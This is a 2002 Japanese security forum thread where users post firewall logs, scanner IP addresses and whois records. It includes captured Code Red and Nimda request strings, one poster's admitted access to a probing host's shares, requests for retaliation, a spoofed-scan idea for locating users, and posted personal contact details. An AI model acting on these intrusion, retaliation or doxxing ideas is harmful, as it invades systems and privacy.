2002/10/27 09:21:09, TCP port probe, 202.108.254.200, 1
1360 ◆vvNw40nbIc :02/10/27 20:11
2002/10/27 09:21:09, Proxy port probe, 202.108.254.200, 2
2002/10/27 09:21:09, SOCKS port probe, 202.108.254.200, 1
2002/10/27 09:21:08, HTTP port probe, 202.108.254.200, 1
2002/10/27 08:48:28, FTP port probe, kiss.pl.gin.cz, 4
2002/10/27 08:32:22, FTP port probe, 210.51.248.127, 3
2002/10/27 08:13:39, FTP port probe, 61.183.172.138, 2
2002/10/27 05:00:52, FTP port probe, 62.211.49.88, 1
2002/10/27 03:16:37, SQL port probe, 195.141.157.37, 3
2002/10/27 02:21:50, FTP port probe, 210.12.186.178, 4
2002/10/27 01:17:48, HTTP port probe, 200-23-182-181.frellinux.frel.com.mx, 2
2002/10/26 23:15:48, HTTP port probe, innogate.rallis.co.in, 1
2002/10/26 22:01:15, SMTP port probe, 211.230.36.131, 3
2002/10/26 22:00:42, TCP port probe, 202.108.254.200, 1
2002/10/26 22:00:40, Proxy port probe, 202.108.254.200, 2
2002/10/26 22:00:38, SOCKS port probe, 202.108.254.200, 1
1370 ◆vvNw40nbIc :02/10/27 20:11
2002/10/26 22:00:35, HTTP port probe, 202.108.254.200, 1
2002/10/26 17:43:26, SQL port probe, 210006066206.ctinets.com, 3
2002/10/26 16:03:46, SQL port probe, host-216-153-146-142.spr.choiceone.net, 3
2002/10/26 15:07:31, FTP port probe, 213.236.234.140, 2
2002/10/26 14:35:04, MSRPC TCP port probe, w115.z066089005.chi-il.dsl.cnc.net, 3
2002/10/26 14:06:02, SQL port probe, sql.partypop.com, 2
2002/10/26 11:43:17, SOCKS port probe, 80.48.245.161, 1
2002/10/26 11:38:06, HTTP port probe, 210.12.214.82, 1






















だから踏み台吊るして何があるのかと(以下略
>>138
踏み台として利用できることがひとめでわかって便利。
1400 ◆vvNw40nbIc :02/10/28 00:47
踏み台にしてこい
ちょっと待った。そもそもそういう目的のスレなんじゃないの?
>>141
○アタッカー
×踏み台
ファイアウォールは 61.213.194.75 (TCP Port 1618) [TCP Flags: S]. から、
このコンピュータ (TCP Port 7743) への インターネット アクセスをブロックしました。

61.213.194.75よ、Port総当りはやめてくれ・・・
ZoneAlarmのlogにお前のIDがいっぱいだ・・・
今はwinny起動してないぞ。
tp241122.seeder.net
146nslookup:02/10/31 13:04
>>145 を晒しage
147名無しさん@お腹いっぱい。:02/11/01 22:16
一度に26通もウィルス届いたら、そりゃあ、泣きたくもなりますわ。
「WORM_FRETHEM.K」(フレゼムK)の対策もしていますので
送ってきても無駄です。どうせ送ってくるのは、ここの馬鹿
でしょうがいいかげんウザイです。

http://ruma.execweb.cx/murmur/index.htm


148あぼーん:あぼーん
あぼーん
149名無しさん@お腹いっぱい。:02/11/02 01:18
219.160.108. 46 p7046-ipad01koufu.yamanashi.ocn.ne.jp
150名無しさん@お腹いっぱい。:02/11/02 01:58
219.160.108. 46 p7046-ipad01koufu.yamanashi.ocn.ne.jp

Port ServiceName Description State

80 www-http World Wide Web HTTP TCP 接続可
81 hosts2-ns HOSTS2 Name Server TCP 接続可
82 xfer XFER Utility TCP 接続可
83 mit-ml-dev MIT ML Device TCP 接続可
110 pop3 Post Office Protocol - Version 3 TCP 接続可
119 nntp Network News Transfer Protocol TCP 接続可

test
cs81219.pp.htv.fi
Name: cs81219.pp.htv.fi
Address: 212.90.81.219

ちなみにコレ(nslookup cs81219.pp.htv.fi)は正引き
じつは>>152=いいヤツと見た
218.158.93.105
155名無しさん@お腹いっぱい。:02/11/03 02:54
218.47.201.181
(i201181.ap.plala.or.jp)
これなんとかしてくれ!。侵入野郎・・・・。

Domain Information:
a. [Domain Name] CC22.NE.JP
d. [Network Service Name] Cable City22 Internet
l. [Organization Type] Network Service
m. [Administrative Contact] SF109JP
n. [Technical Contact] SS372JP
p. [Name Server] ns.cc22.ne.jp
p. [Name Server] ns.enjoy.ad.jp
p. [Name Server] ns2.cc22.ne.jp
y. [Reply Mail] [email protected]
y. [Reply Mail] [email protected]
y. [Reply Mail] [email protected]
[State] Connected (2003/01/31)
[Registered Date] 1997/01/24
[Connected Date] 1997/01/27
[Last Update] 2002/03/25 16:25:39 (JST)
[email protected]
これはなんだ?

The firewall has blocked Internet access to your computer
(TCP Port 445) from 0.0.0.0 (TCP Port 2784).

まぁ、ネタだとは思うが・・・誘導

くだらねぇ質問はここに書き込め Ver2.22
http://pc.2ch.net/test/read.cgi/sec/1034587921/
159名無しさん@お腹いっぱい。:02/11/03 12:08
YahooBB218123214054
YahooBB218123214054
YahooBB218123214054
>>156
それの意味分かって貼り付けてるのか?お前
>>158
ネタじゃないよ。。。とにかくThanks!
IP 65.116.209.154
DNS host-65-116-209-154.day-soulutions.com
163名無しさん@お腹いっぱい。:02/11/03 15:38
南アフリカにもネットができるようだな。
164名無しさん@お腹いっぱい。:02/11/03 16:05
ってゆーか踏み台のIP晒してもあまり意味なくないかい?
166名無しさん@お腹いっぱい。:02/11/03 18:40
ある有名株式会社に生IPでアクセスしたら
すぐに不正アクセスを試みられたよ。
炎壁ではじいたけどね。

こんなことしてたら、晒すぞ。
>>166
具体的に何されたのか書けよ…
>>166
pingとかプロキシチェックの類じゃねーだろうな?オイ
AUTHだと思われ。
他に何あったっけ…
171名無しさん@お腹いっぱい。:02/11/08 18:09
209.99.226.172(1690)
172名無しさん@お腹いっぱい。:02/11/09 11:04
>>171
OrgName: Millicom Argentina SA
OrgID: MILC

NetRange: 209.99.224.0 - 209.99.239.255
CIDR: 209.99.224.0/20
NetName: NET-MIC-AR
NetHandle: NET-209-99-224-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.MILLIC.COM.AR
NameServer: DNS2.MILLIC.COM.AR
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-05-02
Updated: 2001-09-06

TechHandle: DL1111-ARIN
TechName: Larranaga, Diego
TechPhone: 5411-4732-8107
TechEmail: [email protected]

# ARIN Whois database, last updated 2002-11-07 19:05
# Enter ? for additional hints on searching ARIN's Whois database.
とでた
173名無しさん@お腹いっぱい。:02/11/09 11:55
>>172
すごいです! 神と呼ばせてください!
>>173 もっと上手いネタ考えろや
175名無しさん@お腹いっぱい。:02/11/09 13:45
 Λ_Λ
(−_−;)
176名無しさん@お腹いっぱい。:02/11/10 00:46
219.22.208.2
こいつ粘着なんですけど、お分かりの人どうですか?
何が?
というか、わかったとしてどうする気?
知ったかが書き込むオナニースレはここですか?
202.29.34.222
ウザイぐらいアタックしてくる
180名無しさん@お腹いっぱい。:02/11/11 07:42
62.195.112.62 - - [10/Nov/2002:23:47:36 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"
211.111.102.111 - - [11/Nov/2002:01:17:09 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"
61.188.206.165 - - [11/Nov/2002:03:39:42 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"
65.101.46.50 - - [11/Nov/2002:05:19:17 +0900] "GET / HTTP/1.1" 400 376 "-" "-"
203.169.174.254 - - [11/Nov/2002:05:25:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"
204.152.186.58 - - [11/Nov/2002:05:28:24 +0900] "CONNECT 65.122.104.42:7000 HTTP/1.0" 405 300 "-" "-"
24.141.225.1 - - [11/Nov/2002:05:59:56 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321 "-" "-"

煮るなり焼くなりどうぞ。
>>180
スレタイを100回読め。
207.176.215.73
customer-148-223-208-114.uninet.net.mx
こいつは何処だろ?
時間, イベント, 侵入者, カウント
2002/11/16 03:05:41, SMTP port probe, 211.205.165.32, 3
2002/11/16 02:26:56, HTTP port probe, 64.253.228.125, 1
2002/11/15 23:53:52, RPC TCP port probe, 202.102.4.38, 1
2002/11/15 23:17:38, SQL port probe, 210.52.223.4, 3
2002/11/15 23:15:29, HTTP port probe, ART.xxx.or.jp, 2
2002/11/15 16:54:34, NetBIOS port probe, host130-144.pool14416.interbusiness.it, 2
2002/11/15 14:33:27, SQL port probe, 194.200.201.56, 3
2002/11/15 14:21:41, TCP port probe, 203.152.26.170, 2
2002/11/15 13:20:09, HTTP port probe, 211.217.208.111, 3
2002/11/15 06:41:12, SMTP port probe, pcp02801511pcs.catonv01.md.comcast.net, 2
2002/11/15 05:51:14, SMTP port probe, 61.61.68.72, 1
2002/11/15 04:57:05, HTTP port probe, 61.144.18.2, 3
2002/11/15 04:10:56, FTP port probe, 203.194.195.173, 2

ART.xxx.or.jp・・・
185名無しさん@お腹いっぱい。:02/11/16 15:54
ひょっとして俺は踏み台にされているのか?
ルータの通信情報ログに現在確認できるだけで90件もこんなのがあります。

2002/11/16 08:07:15 NAT RX Not Found : UDP 172.26.34.200 : 16432 > 172.26.152.179 : 6970 (IP-PORT=7)
>>184
早とちりはイカン
侵入者のIPアドレス: 200.204.78.230
侵入者のMACアドレス: 0004AC389F41
DNSの逆引き: 200-204-78-230.its.org.br
NetBIOS名: IS~ITSERVER
Node: ITSERVER
Group: ITS

発信元Port番号: 0
宛先Port番号: 0
攻撃の種類: SYN Flooding
カウント: 72
カウント(延べ): 286

発信元Port番号: 4366
宛先Port番号: 1433
攻撃の種類: SQL Port Probe
カウント: 39
カウント(延べ): 138

発信元Port番号: 3581
宛先Port番号: 137
攻撃の種類: Ping of Death
カウント: 18
カウント(延べ): 122

延々と繰り返してる。何なんだこの馬鹿は。
188名無しさん@お腹いっぱい。:02/11/16 20:33
>>187
よかったな
189名無しさん@お腹いっぱい。:02/11/16 23:36
fwisp12-ext-y.docomo.ne.jp DoCoMo/1.0/SO503i/c10
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
は面白い
191名無しさん@お腹いっぱい。:02/11/17 05:13
>>162
に8連射された。なんなの? 意味そのものがわからん。
SYGATEが防いだけど、どんな種類の攻撃なんだろう?
TCPで表示があった。TCPの意味もわからんが、多分、東京のどこか?だと思う。
192名無しさん@お腹いっぱい。:02/11/17 05:28
tcrc.edu.tw (Taiwan)

The domain that you requested, tcrc.edu.tw, has already been registered by the organization below. Please click here to see other options for this name.

Ministry of Education Computer Center
12th Fl, 106, Hoping E. Road, Sec 2.
Taiwan Republic of China, R.O.C
TW

Domain Name: edu.tw

Contact:
TANet, Administrator [email protected]
886-2-27377010-295


whoisうざい
>>191
TCPの意味くらい分かれ。馬鹿が。
IP:24.169.144.135
DNS:hvc-24-169-144-135.hvc.rr.com
>>191-192
低レベルなおまえらが使うソフトじゃないんだよ。アンイスコしろ。
197名無しさん@お腹いっぱい。:02/11/19 07:40
a. [IPネットワークアドレス] 202.244.160.0-202.244.191.0
b. [ネットワーク名] GRASS-NET
f. [組織名] 倉敷芸術科学大学

Time, Intruder, Event, Count
2002/09/27 21:35:05, 61.194.8.76, DNS TCP port probe, 4
2002/09/28 13:27:22, 210.112.133.155, SQL port probe, 2
2002/10/11 18:32:19, 61.240.177.14, HTTP port probe, 2
2002/10/11 22:51:26, 218.15.225.216, HTTP port probe, 3
2002/10/13 13:19:37, 61.149.8.141, HTTP port probe, 1
2002/11/05 17:07:45, 61.149.1.4, HTTP port probe, 1
2002/11/13 15:20:00, 192.168.1.1, UDP port probe, 2
2002/11/15 14:53:11, j191151.ap.plala.or.jp, IP last fragment length changed, 4
2002/11/15 14:56:18, j191151.ap.plala.or.jp, IP last fragment length changed, 4
2002/11/18 21:25:09, 202.244.174.220, DNS name overflow contains %, 2
2002/11/18 21:25:26, 202.244.174.220, DNS name overflow, 4
2002/11/18 21:25:40, 202.244.174.220, DNS non-Internet lookup, 17
198名無しさん@お腹いっぱい。:02/11/19 09:22
c-66-176-160-241.se.client2.attbi.com
しし座流星を観に逝っている間だった
1個しか観られんかったが‥
199名無しさん@お腹いっぱい。:02/11/20 01:36
ポート32968って何??? 210.147.253.195から来たが・・・
200名無しさん@お腹いっぱい。:02/11/22 12:46
>>199
Commonly Used Ethernet Protocol Types
32968 Intergraph Corporation
201名無しさん@お腹いっぱい。:02/11/22 21:46
210.190.142.73(www6.ocn.ne.jp) Port 3488 (TCP)
2ちゃんにいくと上記のプログラムが個人IP宛に送られる
しくみになってます!
ふーん
210.190.142.73(www6.ocn.ne.jp) Port 3488 (TCP).exe
なんてプログラムあるんだ?へー


プ
>>202
ファイル名に使えない文字は使用されてないからあっても不思議じゃないが、何か?
>>203=201
はいはい、ネタは他の板でやれ。
205名無しさん@お腹いっぱい。:02/11/22 23:34
219.191.240.74

うざい。毎日数十回アタックしてくる。
こいつ何者ですか?
曲者
巻者
ものみんた
207名無しさん@お腹いっぱい。:02/11/23 00:57
ここ三日で攻撃してきた糞ドモのIPをいいます。
ノートン先生が反応しまくってんだYO!!
218.222.107.207
218.47.88.99
210.170.243.13
218.42.99.253
61.213.92.52
219.160.255.101
208名無しさん@お腹いっぱい。:02/11/23 01:04
また続き
219.106.29.120
219.108.228.45
218.47.207.21
202.232.95.174
210.238.168.86
210.147.233.171
220.36.100.94
218.42.99.253
61.214.22.161
218.224.185.231
210.254.2.66
61.197.62.155
218.142.168.14
61.125.251.98
61.117.78.134
218.42.100.232
209名無しさん@お腹いっぱい。:02/11/23 01:06
またまた続き

218.217.175.153
202.232.95.112
210.159.215.113
165.76.178.170
219.111.105.112
219.98.249.204
219.111.105.112
211.132.18.47
218.47.23.164
219.104.182.84
61.115.100.58
219.104.137.204
219.160.245.47
61.214.22.161
61.197.62.155
165.76.252.162
218.43.141.91
210.130.186.31
61.210.26.155 以上
1.1.1.1
これって・・・?
>>207-209
既にIPアドレスが変わっていて無関係の人を巻き込む罠。
馬鹿は氏ね。
212名無しさん@お腹いっぱい。:02/11/23 06:20
さっき24.88.47.53からトロイの木馬Backdoor/SubSeven来た。
しかもこのIP、13日にもBackdoor/SubSevenで攻撃にきてる。
日付が変わっても同じ所から同じ手口ってことは同一人物って事?
>>207-210
ノートンが防いだんじゃIPSpoofされて無いかわからないだろうがヴォケ。
晒したかったらTCP接続を確立させてからにすることだ。
こんなこと書いても、お前の知能じゃ何を言っているかわからないだろうから、わかるように超訳してやる。

素人は帰れ、二度と来るな。
214>>213:02/11/23 15:12
>>213


>>212
>しかもこのIP
恥ずかしいからIPIP言うな馬鹿

得意げに「最近うちの鯖にアタックくんのがウゼェよ」とか言ってそうだな
こいつら・・
スキャニングでいちいち騒ぐなシロウトども。
されるのが嫌ならネットワークから切り離せよ。
215214:02/11/23 15:25
ムハー駄目だ駄目だ。あんまり馬鹿すぎて罵らずにはいられない。
>>207〜209
>ここ三日で攻撃してきた糞ドモのIPをいいます。
>ノートン先生が反応しまくってんだYO!!
lol
あんた、プールアドレスって知ってマスカ?
なんというかスキャンしてきたアドレス晒す神経が信じられん。
ご丁寧に全部掲載ですか(><
あんたの師匠のノートン大先生がウルサイんだったら、
ボロPC買ってきてFWに仕立ててフィルタすりゃあいい。
ログの出力も閾値とか考えてさ・・
手作業で構築していくうちに少しはIP通信を理解していくんじゃないかね。
216214:02/11/23 15:34
連続投稿ゴメン

でも、ここに書いてる人らの話みてると、自らもNetbiosブロードキャスト
ばらまいてそうな感じ。フィルタしといてね。
http://www.rtpro.yamaha.co.jp/RT/FAQ/IP-Filter/NetBIOS-Filter.html
217名無しさん@お腹いっぱい。:02/11/23 18:03
>219.191.240.74

ヤフーのユーザーです。
218名無しさん@お腹いっぱい。:02/11/24 17:29
ntgifu004236.gifu.nt.isdn.ppp.infoweb.ne.jp
219名無しさん@お腹いっぱい。:02/11/24 22:12
inetnum: 211.90.0.0 - 211.91.255.255
netname: UNICOM
country: CN
descr: China United Telecommunications Corporation
admin-c: UCH1-AP
tech-c: UC6-AP
status: ALLOCATED PORTABLE
changed: [email protected] 20020917
mnt-by: MAINT-CNNIC-AP
source: APNIC

role: Unicom China Hostmaster
address: 911 Room,Xin Tong Center,No.8 Beijing Railway Station
address: East Avenue, Beijing,PRC.
country: CN
phone: +86-10-6527-8866
fax-no: +86-10-6526-0124
e-mail: [email protected]

>>219
っで、何が言いたいの?
>>220
自分の低脳ぶりを誰かにわかって欲しいんじゃない?
222名無しさん@お腹いっぱい。:02/11/25 10:20
>[17098-7]
>投稿者:[sniper]  投稿日:[2002年11月25日(月) 10:51:53]
>私の親友は、ある人の職業・本名しっかり調べたよ(笑)
>そして現在居住地も‥‥‥

>[17110-7]
>投稿者:[sniper]  投稿日:[2002年11月25日(月) 10:51:53]
>串屋の83の亡霊
>なぜそれほど気になる?

>串屋に教えると思っているのか?ア・マ・イ
>そんな間がらじゃないないよ

>キミの妄想癖で推測したらどうかな?

>異常な粘着質
>執拗なぶら下がり
>オートリバースな会話
>ボキャ貧
>検索魔

>これがキミの印象だ

http://www.makiko.gr.jp/cgi-bin/bbs.cgi
223名無しさん@お腹いっぱい。:02/11/25 19:09
219.106.116.162

inetnum: 219.106.0.0 - 219.106.127.255
netname: SANNET
descr: SANYO Electric Software Co., Ltd.
>>223
馬鹿は死ね
225名無しさん@お腹いっぱい。:02/11/25 20:07
165.76.253.174
こいつさっきから攻撃しまくってきてる。(今も攻撃してきてる
めっちゃうざい
226名無しさん@お腹いっぱい。:02/11/25 20:08
言い忘れましたが約三十秒に一回で攻撃してきています。
>>226
馬鹿は死ね
228名無しさん@お腹いっぱい。:02/11/25 20:23
174.pool5.dsl8mtokyo.att
229名無しさん@お腹いっぱい。:02/11/25 20:24
>>227
それしか言えないお前が死ね
自分がアタックされているのはどこでみるのですか?
当方セキュリティソフトなにもいれてません。
もうばんばん攻撃とかされてり盗まれたりしてるんですかね?
231cheshire-cat ◆PhCATJR.v6 :02/11/25 21:39
>>230
つか、迷い人発見。
よーわからんのなら、とりあえずルーター入れて、パソにプライベートIPアドレス割り当てて下され。

http://pc.2ch.net/test/read.cgi/sec/1035688068/
http://pc.2ch.net/test/read.cgi/sec/1033726535/
232名無しさん@お腹いっぱい。:02/11/25 22:47

1時間30分程前、多分中国からだと思いますがport probeがありましたので
お知らせします、今現在ネットから繋がりますので興味がある方は法律に触れない
よう気をつけて調査して下さい。

IP:202.101.212.139
Node: A
NetBIOS: IS~A
Group: WORKGROUP
MAC: 00E04C00003F
共有ネットワーク:12(PC)

どうも、学校もしくは
会社から不正アクセスしているようですが、こちらから侵入できる
ところをみると、MS修正パッチをあてていないようです。
ただ、12フォルダ内のemlのファイルはあきらかにnimda32ウィルスを
検知しており極めて危険な存在です。

ウィルスを蔓延させる可能性もあるので皆さん注意して下さい。
233cheshire-cat ◆PhCATJR.v6 :02/11/25 23:09
>>232
ウイルスの感染活動を、不正アクセスって一括りにまとめてまうのは、いかがなものかと。
>>232
ハァ?一々上げんな。
235名無しさん@お腹いっぱい。:02/11/25 23:40
>>233-234
ただ、12PC上の2emlのファイルが同じnimda32ウィルス感染ファイルを保存しているひとも、
おかしいですよ!
容量もかるく5〜9MB以上あるメールですよ!!
普通の人じゃないです。
236cheshire-cat ◆PhCATJR.v6 :02/11/26 00:04
>>235
超マジレスですが。
それを確かめに逝ったって時点で、広義での不正アクセスっす、君って。

放置でええやん、そんなの。

中国(中華人民今日は酷)で違法コピーが蔓延していますが、
ウィルス、とくに Redlof に感染しまくりの公司やなにやら、
いっぱいありぃーのがありますので、ご注意を…
238230:02/11/26 01:15
>>231
ゾーンアラームってのをいれてみました。
ありがとうございます。
まあ、ことこの手のスレに「報復」しに来る輩の件に関しては
小学生を相手に話をしているのと同様に考えたほうが良いかと。
240名無しさん@お腹いっぱい。:02/11/26 16:31
n238155.ap.plala.or.jp
241名無しさん@お腹いっぱい。:02/11/27 09:34
中国からハッキングされそうになった・・・
http://whois.ansi.co.jp/?key=211.248.32.5
242bloom:02/11/27 09:38
pc15162.amigo2.ne.jp
ntgifu006024.gifu.nt.isdn.ppp.infoweb.ne.jp
相変わらず、このスレは馬鹿が大暴れしてるな。
scanぐらいでぎゃーぎゃーさわいでんじゃねぇよ。ボケども。
245名無しさん@お腹いっぱい。:02/11/29 08:00
Registrant:
Shigeru Kanemoto
9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan

Registrar: Dotster (http://www.dotster.com)
Domain Name: PPONA.COM
Created on: 20-MAR-01
Expires on: 20-MAR-04
Last Updated on: 29-JUN-02

Administrative Contact:
Kanemoto, Shigeru [email protected]
9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan
+81-3-5226-7552
+81-3-5226-7551

Technical Contact:
Kanemoto, Shigeru [email protected]
9-2-401, Nibancho
Chiyoda, Tokyo 1020084
Japan
+81-3-5226-7552
+81-3-5226-7551

246ななし:02/11/29 12:09
61.120.31.161
これ串ですかね?
247名無しさん@お腹いっぱい。:02/11/29 14:21
↑5点だ、5点
249名無しさん@お腹いっぱい。:02/11/30 12:15
>>244
馬鹿が大暴れしてるカキコしか反応しないボケです。
250鹿丸:02/11/30 12:26
http://www.geocities.co.jp/Bookend-Christie/7720/

自分のホームです遊びに来てみろごらぁ
251名無しさん@お腹いっぱい。:02/11/30 16:46
此処でスプーイングの偽装を勉強汁
http://www.toyo.co.jp/security/ice/advice/Underground/Hacking/Methods/Technical/Spoofing/default.htm
インターネットセキュリティーの会社だyo
偽造したアドレスで広域にスキャンする。
偽造アドレスとスキャンしたアドレスの対応とっとけば馬鹿が何処にいるかわかるな。(w
253名無しさん@お腹いっぱい。:02/11/30 21:09
>>244
じゃぁ、スキャンするなよw
>>253
はぁ? してねぇよ。
お前の頭おかしいんじゃねぇか?
一回死んでこい。
>>254
それはどうかな?
>>255
わけわかんね。
余裕こいてんじゃねぇよ。
お前も死ねよ。ばーか。
257名無しさん@お腹いっぱい。:02/12/07 11:51
Time, Intruder, Event, Count
2002/12/07 YahooBB218124046061.bbtec.net, DNS non-Internet lookup, 1
2002/12/07 YahooBB218124046061.bbtec.net, DNS non-Internet lookup, 1
2002/12/07 218.124.46.61, DNS name overflow, 1
258名無しさん@お腹いっぱい。:02/12/07 12:05
>>252
バカに教えてクレイ。
偽装IPでスキャンした場合、スキャン結果は偽装IP先へ届かないか?
>>258 届く。
>>259
センクス。ってことは、
 【攻撃したヤシのPCには届かない = クラッカーに情報が届かない】
じゃん?
結果が届かなければ、スキャンの意味ないのでは。
DOS系やflood系などなら偽装の意味もわかるのだが。
SRC xx.xx.0.0 - xx.xx.255.254
DST yy.yy.0.0 - yy.yy.255.254
でスキャンするだろ。んでもって馬鹿がxx.xx.100.100から攻撃されたと騒いだら
馬鹿のIPアドレスはyy.yy.100.100って事じゃねいかい。
なるほろ。

    【  納  得  】


>>252の意味がワカタヨヽ(´ー`)ノ
263名無しさん@お腹いっぱい。:02/12/07 15:07
257のは、それで何が分かりますか?
264名無しさん@お腹いっぱい。:02/12/07 17:16
ここのyulibu-311(推定20後半〜30代のババア) metalsilver00(20代後半の自称有名企業の干され組)の書き込みはあまりにアホすぎ(藁)
天誅いっちゃう?うははははは。

http://www.excite.co.jp/bbs/personal/ma/thread?t=43717
>>264 ネトヲチ板逝け
>>263
キミが257によって把握できた情報を書いてミソ
267名無しさん@お腹いっぱい。:02/12/08 09:22
2002/12/08 09:10:17 IP_Filter REJECT UDP 192.168.1.2:137 > 192.168.1.255:137 (IP-PORT=0)

この同一IPのログが立て続けに昨日から200件あります。
接続を一旦切って繋げ直してもまた出ます。
これは一体なんでしょうか?
>>267
ローカルホストだからあなたのパソコン。
269名無しさん@お腹いっぱい。:02/12/10 18:22
6分間で4回続けて。
なんか怖いなー。

64.71.177.66
270名無しさん@お腹いっぱい。:02/12/10 18:23
↑さっきみたら更に2回…
((;゚Д゚)ガクガクブルブル
271名無しさん@お腹いっぱい。:02/12/10 18:41
>>270
そんなん普通だろ?
272名無しさん@お腹いっぱい。 :02/12/10 18:46

192.116.231.167 うざい!
こいつを懲らしめる方法を教えてください
273名無しさん@お腹いっぱい。:02/12/10 19:00
74 :無名さん :02/12/01 23:30
↑オマエは頭の悪いバンドマンだなーどうせオールナイトイベントに出てた
スキムミルクっていうバンドだろ?ライブ中の態度でけーんだよ。
ツアーバンドはノルマとらないんだよ。それからいい音出すPAも雇ってチラシも
すってんだよ。金かかってるんだよ。そのくせてめえら客よばね―のか?
Y野氏の組織はやばいからねーパソコンオタクもいるから調べられて
そんな事言ってるとCHOKOに本当にカツアゲされるぞ。
2ちゃんねるキラー組織って知ってるかなー君?
http://music.2ch.net/test/read.cgi/minor/1031619119/74

136 :無名さん :02/12/10 11:22
>>101
その話知ってるよ。「CHOKOのメンバー連れて来い」って言ってたよね。
あんまり詳しく書くと2ちゃんねるキラー組織にやられそうなんで
書けないけどね。
 結局74=Y野って事でよろしいですか?
http://music.2ch.net/test/read.cgi/minor/1031619119/136

2ちゃんねるキラー組織キタ━━━)゚∀‘)・ω・) ゚Д゚)゚∀゚)・∀・) ̄ー ̄)´_ゝ‘)-_)゚∋゚)´Д`)・∀。)━━━━!!

このスレには2chキラー組織とやらを知っているものが潜んでいるらしい。
今後祭りになるかならないかは今後の動向次第。
興味のあるものは、そいつらに追求をして白状させよう。

関連スレ
CHOKO統一スレ
http://music.2ch.net/test/read.cgi/minor/1031619119/
CHOKOというバンドのサイト
http://choko3.hp.infoseek.co.jp/
矢野的思考
http://www.seicion.ne.jp/sr_diarys/564CHOKO/
>>272
お前のローカルホストだから、自分でやれ。
275名無しさん@お腹いっぱい。:02/12/10 19:39
>> 274
ちゃうよー。
アドレスから検索すればわかるが、これはイタリアからのアタックです。
>>275
it と il を見間違えてるよな?

il → イスラエル
>>275
>この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
>様々なネット上の危険からの防御法や対策を語りあうための板です。
>掲示板の荒らし方や侵入の方法、メールボムの送り方等、
>攻撃方法の質問はご遠慮下さい。
>2ちゃんねるでは荒らし依頼は出来ません。
>また、この板ではアタック依頼は受け付けません。
>ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
うおぉぉぉりゃぁぁぁーーーー
62.139.254.116
279名無しさん@お腹いっぱい。:02/12/11 22:25
こいつ国内の nimuda でやがんの。まだこんな奴いるとはね
[Thu Nov 21 18:12:00 2002] [error] [client 61.213.242.130] File does not exist:
/xxx/xxx/htdocs/scripts/root.exe
>>279 nimudaってあんた..
iplog[19100]: TCP: port scan detected [port 443] from 62.79.111.26 [ports 49939,49941,49942,49967,49970,...]

ところでこういう方にはどうしてますか?
やり返すとか?どうやり返せと?
方法キボンヌ
282名無しさん@お腹いっぱい。:02/12/12 03:58
80.117.33.195:23319
イタリア人まじうぜー
283名無しさん@お腹いっぱい。:02/12/12 04:32
i031252.ap.plala.or.jp
284名無しさん@お腹いっぱい。:02/12/12 06:26
dsl081-127-201.dfw1.dsl.speakeasy.net
妙なTCPポートで漏れのPCから発信・・・
285名無しさん@お腹いっぱい。:02/12/12 17:56
286名無しさん@お腹いっぱい。:02/12/13 04:14
ポート1433に211.186.130.98から。ウザー
217.84.253.142:33441 (pD954FD8E.dip.t-dialin.net) ポート 2402 (TCP)
今日に入ってから延々と30回のアタックが続いている。繋ぎ直しても同じ。
ファイアーウォール入れて以来、ここまでしつこいのは初めて。
288287:02/12/13 07:54
50回に達する前に回線切ってメシ食って、
繋ぎなおしたら止まってますた。
なんか、ポート443をやたらスキャンしてくるから、
サイト見に行ってみたらここだった。

http://rome.tanaka.giti.waseda.ac.jp

通信リサーチセンターとか書いてあるけど、人のメルポトスキャンして
いったいなにをしようというのか・・・。
名前も大学名も思いっきり入ってるし。
>>289
そういうこと書けば書くほど
その機関ではなく>>289自体の無知さ加減があらわになるんだが。
291289:02/12/14 18:34
>>290
どういう意味?オセーテ。
292名無しさん@お腹いっぱい。:02/12/14 18:38
あげ
445とかつつかれるとちょっとびびるね。
心臓に悪いからやめてくれ。
でも80とかくるのはなんだろう?ほむぺと間違えてるのか?

メッセンジャー、ファイヤーウォールでカットするとすごいことになるよ。
60回とか平気でトライしようとするもん。そんなしつこくしなくても・・
[11/Dec/2002: +0900] "PROPFIND /SharedDocs HTTP/1.1" 404 282
[11/Dec/2002: +0900] "PROPFIND /SharedDocs HTTP/1.1" 404 282
[11/Dec/2002: +0900] "GET / HTTP/1.1" 200 4306
[11/Dec/2002: +0900] "GET /icons/blank.gif HTTP/1.1" 304 -
[11/Dec/2002: +0900] "GET /icons/folder.gif HTTP/1.1" 304 -
[11/Dec/2002: +0900] "GET /icons/image2.gif HTTP/1.1" 304 -
[11/Dec/2002: +0900] "GET /icons/text.gif HTTP/1.1" 304 -

コレって何しようとしてたの?
ずっと見てて不思議に思ったんだけど。意図がよくわからん。
一応侵入者のログです。
295名無しさん@お腹いっぱい。:02/12/14 23:32
侵入者つうかハッカーって誰のPCにも攻撃してくるんですか!?
このスレ見てるとみんな実は被害にあってるのかなぁっと思ったりします。
>>295
99%ゴミバケツかネットワーク設定者のミスです
>>294
見たままだ。そのまま理解しれ。わからなくても気にするな。弾いたんだろ?
>>295
大部分の人がファイヤーウォールで防いでいると思うよ。
もれは2日前に導入したばかりのZoneAlarmが334回も防いでいるよ。
うち30回は危険なアクセスだとよ。
299名無しさん@お腹いっぱい。:02/12/14 23:51
ダイヤルアップのIPアドレスだと地域を特定されませんか?
>>299
IPアドレスから地域を特定できたら神。
>>299は数人しかインターネットユーザがいないような過疎地域に住んでるのか?
